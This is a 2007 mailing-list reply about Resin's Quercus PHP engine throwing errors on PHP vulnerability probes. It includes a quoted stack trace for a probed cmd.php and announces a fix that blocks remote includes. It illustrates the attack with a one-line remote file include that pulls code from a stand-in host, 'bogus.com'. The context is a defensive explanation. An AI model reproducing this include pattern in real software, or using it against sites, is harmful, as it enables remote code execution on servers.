On Dec 1, 2007, at 7:17 AM, Jason Chodakowski wrote:

> Should Resin be reacting this way to probes for php vulnerabilities?

That's been fixed for 3.1.4.  Quercus should be returning a 404.

The 3.1.4 release will include some other fixes related to those PHP  
probes.

One of the vulnerabilities they're trying to exploit is a PHP include  
of a http file, e.g.

import "$foo";

where $foo = "http://bogus.com/bad-file";;

Apparently, some PHP programs use the query parameter in the import  
(!?!)

In the update, Quercus disallows remote includes (we were duplicating  
PHP's behavior too well, it looks like.)

-- Scott
>
> javax.servlet.ServletException: java.io.FileNotFoundException: /usr/
> local/resin/webapps/ROOT/stats/cmd.php (No such file or directory)
> [03:52:56.636]        at
> com
> .caucho
> .quercus.servlet.ResinQuercusServlet.service(ResinQuercusServlet.java:
> 183)
> [03:52:56.636]        at
> com.caucho.quercus.servlet.QuercusServlet.service(QuercusServlet.java:
> 350)
> [03:52:56.636]        at
> javax.servlet.http.HttpServlet.service(HttpServlet.java:91)
> [03:52:56.636]        at
> com
> .caucho
> .server.dispatch.ServletFilterChain.doFilter(ServletFilterChain.java:
> 103)
> [03:52:56.636]        at
> com
> .caucho
> .server.webapp.WebAppFilterChain.doFilter(WebAppFilterChain.java:175)
> [03:52:56.636]        at
> com
> .caucho
> .server.dispatch.ServletInvocation.service(ServletInvocation.java:240)
> [03:52:56.636]        at
> com.caucho.server.hmux.HmuxRequest.handleRequest(HmuxRequest.java:424)
> [03:52:56.636]        at
> com.caucho.server.port.TcpConnection.run(TcpConnection.java:481)
> [03:52:56.636]        at com.caucho.util.ThreadPool
> $Item.runTasks(ThreadPool.java:685)
> [03:52:56.636]        at com.caucho.util.ThreadPool$Item.run 
> (ThreadPool.java:
> 607)
> [03:52:56.636]        at java.lang.Thread.run(Thread.java:613)
>
> I mean... sure the file isn't there, and I don't even have any php
> content to even consider.
>
> This from the jvm log.
>
> J --
>
>
> _______________________________________________
> resin-interest mailing list
> resin-interest@caucho.com
> http://maillist.caucho.com/mailman/listinfo/resin-interest



_______________________________________________
resin-interest mailing list
resin-interest@caucho.com
http://maillist.caucho.com/mailman/listinfo/resin-interest

Reply via email to